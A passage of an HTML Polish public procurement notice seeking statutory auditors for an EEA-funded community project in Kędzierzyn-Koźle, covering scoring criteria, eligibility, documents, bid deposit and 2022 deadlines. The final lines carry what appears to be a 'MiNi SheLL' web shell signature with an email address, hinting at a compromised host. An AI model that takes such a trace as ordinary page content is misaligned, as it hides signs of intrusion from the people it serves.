7 mogą ulec zmianie, co związane jest z możliwością przesunięcia Harmonogramu prac, a tym samym zmianą terminów wystawienia faktur i innych dokumentów finansowo-księgowych, będących przedmiotem oceny i kontroli ze strony Biegłego rewidenta.(...). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79212100-4 - Usługi audytu finansowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość zwiększenia zakresu zamówienia do max 25% wartości umowy brutto, na poniższych zasadach:<br/>a)	Wykorzystanie wskazanej opcji nastąpić może w terminie obowiązywania umowy, a zamówienie objęte opcją będzie rozliczane w oparciu o cenę jednostkową podaną w ofercie. <br/>b)	Wykonanie prawa opcji nastąpi poprzez pisemne oświadczenie woli Zamawiającego o skorzystaniu z prawa opcji. <br/>c)	W przypadku skorzystania z prawa opcji, Wykonawca zobowiązany jest do jego wykonania na warunkach określonych w umowie dla zamówienia podstawowego. <br/>d)	Zamawiający może skorzystać z prawa opcji w całości lub części. W przypadku skorzystania z prawa opcji <br/>w części, Zamawiający może realizować prawo opcji wielokrotnie, do wyczerpania kwoty.<br/>e) Prawo opcji jest uprawnieniem Zamawiającego, a nieskorzystanie z tego prawa nie stanowi podstawy do dochodzenia przez Wykonawcę roszczeń odszkodowawczych z tytułu niezrealizowania zamówienia objętego tym prawem. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena całkowita brutto: 60% = 60 pkt. Cena całkowita brutto [zł] <br/>Liczba punktów = (Cmin/Cof) * 60 pkt, gdzie: Cmin – najniższa cena spośród wszystkich ofert; Cof –<br/>cena badanej oferty. <br/>2. Liczba zrealizowanych usług badanych projektów przez biegłych rewidentów: 20% = 20 pkt. <br/>Liczba zrealizowanych usług badanych projektów przez biegłych rewidentów [ilość]<br/>Liczba możliwych do uzyskania punktów - max 20 pkt.<br/>Punktacja przyznawana będzie w zależności od liczby projektów dofinansowanych środkami Unii <br/>Europejskiej, Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego lub Norweskiego <br/>Mechanizmu Finansowego, których badania dokumentów finansowo-księgowych podjęli się biegli <br/>rewidenci. <br/>Doświadczenie obu biegłych rewidentów liczone jest łącznie, w następujący sposób: <br/>a) 0 pkt - za wykonanie do dwóch usług ww. typu, <br/>b) 10 pkt za realizację ww. usługi dla trzech różnych projektów, <br/>c) 15 pkt za realizację ww. usługi dla czterech różnych projektów,<br/>d) 20 pkt za realizację ww. usługi dla pięciu różnych projektów i więcej.<br/>Wskazane w ofercie osoby, będą pełniły funkcję biegłego rewidenta przy realizacji zamówienia <br/>objętego niniejszym postępowaniem. Zamawiający dopuszcza na etapie realizacji zmianę osób <br/>pełniących tę funkcję, pod warunkiem, że Wykonawca wykaże, że nowa proponowana osoba posiada <br/>nie mniejsze doświadczenie niż wykazane dla ww. biegłego rewidenta w złożonej ofercie (załącznik nr <br/>1 do SWZ). W przypadku, gdy opis doświadczenia będzie niejednoznaczny lub niepozwalający na jego <br/>ocenę Zamawiający nie będzie przyznawał punktów za taki opis, z zastrzeżeniem art. 223 ust. 1 ustawy <br/>Pzp. <br/>Dokument, w którym zostanie wskazane doświadczenie osoby (w zakresie liczby zrealizowanych usług <br/>badanych projektów), które będzie oceniane w ramach kryterium oceny ofert, stanowi treść oferty <br/>dlatego nie podlega uzupełnieniu.<br/>W przypadku, gdy w wyniku weryfikacji przez Zamawiającego spełnienia warunku udziału w <br/>postępowaniu, w odpowiedzi na wezwanie Zamawiającego (np. w trybie art. 274 ust. 1 ustawy Pzp) <br/>Wykonawca dokona zmiany osoby spełniającej warunek udziału w postępowaniu, niezależnie od <br/>wskazanego doświadczenia nowego biegłego rewidenta, Zamawiający przyzna Wykonawcy w ramach <br/>niniejszego kryterium oceny ofert 0 pkt.<br/>Wykonawca zobowiązany jest wykazać liczbę zrealizowanych usług badanych projektów przez <br/>biegłych rewidentów w sposób precyzyjny w pkt IV ppkt 5 formularza ofertowego.<br/>3. Liczba grup podmiotów na rzecz których realizowane były usługi przez biegłych rewidentów: 20% <br/>= 20 pkt. <br/>Liczba grup podmiotów na rzecz których realizowane były usługi przez biegłych rewidentów [ilość].<br/>Liczba możliwych do uzyskania punktów - max 20 pkt.<br/>Punktacja przyznawana będzie w zależności od liczby różnorodności grup podmiotów na rzecz <br/>których realizowane były te usługi badania projektów dofinansowanych ze środków Unii Europejskiej, <br/>Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego lub Norweskiego Mechanizmu <br/>Finansowego przez biegłych rewidentów. <br/>Liczba podmiotów na rzecz których realizowane były usługi przez biegłych rewidentów będzie <br/>oceniana w następujący sposób: <br/>za zrealizowaną umowę w zakresie usługi badania dokumentów finansowo-księgowych projektu <br/>dofinansowanego środkami UE, EOG lub NMF, realizowaną na rzecz danej grupy podmiotów <br/>przyznane zostanie:<br/>a) 10 pkt za realizację ww. usługi dla podmiotów z tej samej grupy (np. tylko na rzecz jst, tylko na <br/>rzecz spółek prawa handlowego lub tylko na rzecz organizacji pozarządowych, dalej jako ngo,<br/>b) 15 pkt za realizację ww. usługi dla podmiotów z dwóch różnych grup (np. na rzecz jst i spółek <br/>prawa handlowego lub na rzecz jst i ngo),<br/>c) 20 pkt za realizację ww. usługi dla podmiotów z trzech różnych grup (np. na rzecz jst, spółek prawa <br/>handlowego i na rzecz ngo).<br/>Wykonawca zobowiązany jest wykazać grupy podmiotów na rzecz których realizowane były usługi <br/>przez biegłych rewidentów w sposób precyzyjny w pkt IV ppkt 5 formularza ofertowego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba zrealizowanych usług badanych projektów przez biegłych rewidentów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">: Liczba grup podmiotów na rzecz których realizowane były usługi przez biegłych rewidentów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa.<br/>I. Wykonawca wskaże osoby do wykonania niniejszego zamówienia wraz z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia, a także zakresu wykonywanych przez nie czynności, które spełniają następujące warunki:<br/>co najmniej dwie osoby (biegli rewidenci), posiadający uprawnienia do badania sprawozdań finansowych, zgodnie z ustawą z dnia 11 maja 2017r. o biegłych rewidentach, firmach audytorskich oraz nadzorze publicznym (Dz.U. 2020, poz. 1415 z późn. zm.).<br/>II. Wykonawca powinien wykazać, że w okresie ostatnich 3 lat, przed upływem terminu składania oferty, a jeśli okres działalności jest krótszy – w tym okresie, zrealizował, a w przypadku świadczeń okresowych lub ciągłych, że realizuje na rzecz co najmniej dwóch różnych jednostek sektora finansów publicznych (w tym jednostki samorządu terytorialnego) usługi badania dokumentów finansowo-księgowych związanych z rozliczeniem projektów dofinansowanych środkami zewnętrznymi *<br/>lub <br/>dla jednej jednostki sektora finansów publicznych (w tym jednostki samorządu terytorialnego) usługi badania dokumentów finansowo-księgowych dwóch różnych projektów *. <br/><br/>* Realizowane przez wykonawcę usługi winny dotyczyć badania projektów, wśród których jedno dofinansowane było z funduszy Unii Europejskiej, a drugie dofinansowane było z Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego (MF EOG) lub Norweskiego Mechanizmu Finansowego (NMF). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem <br/>najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w <br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących <br/>podmiotowych środków dowodowych w zakresie potwierdzenia warunków udziału w postępowaniu: <br/>1)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - w zakresie niezbędnym do wykazania warunku udziału w postępowaniu (wzór stanowi załącznik nr 4 do SWZ).<br/>2)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (wzór stanowi załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ, 2) <br/>Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu na <br/>podstawie art. 125 ust. 1 ustawy Pzp (wzór oświadczenia stanowi załącznik nr 2 do SWZ). Oświadczenie <br/>składają odrębnie: a) wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz <br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje <br/>spełnianie warunków udziału w postępowaniu; b) podmiot udostępniający zasoby, na którego potencjał <br/>powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim <br/>przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału <br/>w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy. Wymagana forma –<br/>pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem <br/>zaufanym lub podpisem osobistym. 3) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że <br/>osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania. 4) pełnomocnictwo lub <br/>inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby <br/>składającej ofertę nie wynika z dokumentów opisanych w 3. 5) w przypadku wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia: a) pełnomocnictwo, w przypadku wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania <br/>ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postepowaniu i zawarcia umowy w <br/>sprawie zamówienia publicznego; b) oświadczenie, o którym mowa w pkt 6.4 SWZ (Zamawiający <br/>dopuszcza złożenia tego oświadczenia na formularzu ofertowym). 6) zobowiązanie podmiotu <br/>udostępniającego zasoby do oddania lub inny podmiotowy środek dowodowy potwierdzający, że <br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami podmiotów -wskazany w pkt <br/>7.3 oraz 7.4 SWZ (jeżeli dotyczy). 7) dowód wniesienia wadium. 2. Wykonawca nie jest zobowiązany do <br/>złożenia dokumentu rejestrowego, o których mowa w pkt 1.3) SWZ, jeżeli Zamawiający może je uzyskać za <br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp <br/>do tych dokumentów. 3. Zapisy pkt 1.4) stosuje się odpowiednio do osoby działającej w imieniu <br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. 4. Zapisy pkt 1.3), 1.4) i 2 stosuje się <br/>odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości: 1 000,00 PLN (słownie: jeden tysiąc zł PLN).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert.<br/>3. Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu: przelewem na rachunek bankowy Zamawiającego: PKO BP Kędzierzyn-Koźle 57 1020 3714 <br/>0000 4102 0108 5455;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada <br/>2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019r. poz. 310, 836 i 1572).<br/>5. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z ustawy Pzp, w <br/>szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie <br/>Zamawiającego, w przypadkach określonych w ustawie Pzp oraz być ważne przez okres związania ofertą, <br/>określony w niniejszej SWZ. Musi być wykonalne na terytorium Rzeczypospolitej Polskiej.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu <br/>oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia <br/>jednej z okoliczności: <br/>1) upływu terminu związania ofertą; <br/>2) zawarcia umowy w sprawie zamówienia publicznego; <br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte <br/>odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca <br/>wadium wykonawcy: <br/>1) który wycofał ofertę przed upływem terminu składania ofert; <br/>2) którego oferta została odrzucona; <br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako <br/>najkorzystniejsza; <br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność <br/>unieważnienia albo nie upłynął termin do jego wniesienia. <br/>9. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 8, powoduje rozwiązanie stosunku prawnego z <br/>wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w <br/>dziale IX ustawy Pzp. <br/>10. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie <br/>gwarancji lub poręczenia występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium <br/>w okolicznościach wskazanych w art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do <br/>reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia <br/>Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą. 2. Warunek <br/>dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został <br/>sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej <br/>jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do <br/>prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te <br/>uprawnienia są wymagane. 3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji <br/>zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o <br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi do <br/>realizacji których te zdolności są wymagane. 4. W przypadku, o którym mowa w pkt 2 i 3, wykonawcy <br/>wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego <br/>wynika, które usługi wykonają poszczególni wykonawcy. 5. Pełnomocnictwo powinno jednoznacznie <br/>określać postępowanie, do którego się odnosi I precyzować zakres umocowania. Zaleca się, aby <br/>Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka <br/>korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. 6. Oświadczenie o <br/>niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu (art. 125 ust. 1) składa każdy z <br/>Wykonawców wspólnie ubiegających się o zamówienie. Dokument ten potwierdza spełnienie warunków <br/>udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców <br/>wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. 7. Każdy z <br/>Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu <br/>z postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw do <br/>wykluczenia składają każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli <br/>dotyczy). 8. W przypadku wykonawców wspólnie ubiegających się o zamówienie, których oferta zostanie <br/>uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani do <br/>zawarcia umowy cywilnoprawnej określającą rolę i zadania poszczególnych Wykonawców oraz zasady ich <br/>współdziałania podczas realizacji zamówienia. Zamawiający może żądać przedstawienia wyżej wskazanej <br/>umowy. 9. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za <br/>wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień umowy na podstawie art. 455 ust. 1 ustawy Pzp. <br/>Szczegółowe zasady wprowadzania zmian określone zostały w PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-14 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć w formie elektronicznej za pośrednictwem Platformy, działającej pod adresem https://epropublico. pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=f15dda4c-01df-4c59-b90fa767d9826443</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-14 13:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie dotyczy projektu &#34;ROZWÓJ LOKALNY&#34; pn. „Dugnad w Kędzierzynie-Koźlu. Integracja <br/>mieszkańców oraz odbudowa relacji sąsiedzkich jako podstawa rozwoju lokalnego” dofinansowanego ze <br/>środków Mechanizmu Finansowego EOG .<br/>3.2.1	Zamówienie należy realizować w terminie: od dnia zawarcia umowy do 30.04.2024r., przy zachowaniu nw. terminów cząstkowych wyznaczonych na zaopiniowanie Raportów składanych przez Zamawiającego, tj. <br/>- Raportu rocznego w terminie do 18 stycznia 2023r. oraz 18 stycznia 2024r., z zastrzeżeniem, że Raporty roczne zostaną przekazane Biegłemu rewidentowi do sprawdzenie, tylko w sytuacji kiedy wraz ze sprawozdaniem merytorycznym (stanowiącym CZĘŚĆ „A” Raportu), Zamawiający będzie rozliczał jednocześnie sprawozdanie finansowe i wnioskował o kolejną transzę dotacji (czyli będzie składał CZĘŚĆ „B” Raportu), <br/>- Raportu końcowego do 30 kwietnia 2024r.,<br/>- Raportu okresowego do 14 dni od przekazania kompletu dokumentów.<br/>3.2.2	Zamawiający oświadcza, iż termin zakończenia realizacji Projektu przypada na dzień 30 kwietnia 2024r.<br/>3.2.3	Gwarancja na wykonane prace wynosi 12 miesięcy licząc od daty odbioru ww. dokumentacji. <br/>3.2.4	W przypadku stwierdzenia omyłki pisarskiej lub błędów merytorycznych ujawnionych w przygotowanych przez biegłego rewidenta dokumentach, Wykonawca dokona stosownej korekty tych dokumentów na wezwanie Zamawiającego w okresie do 12 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com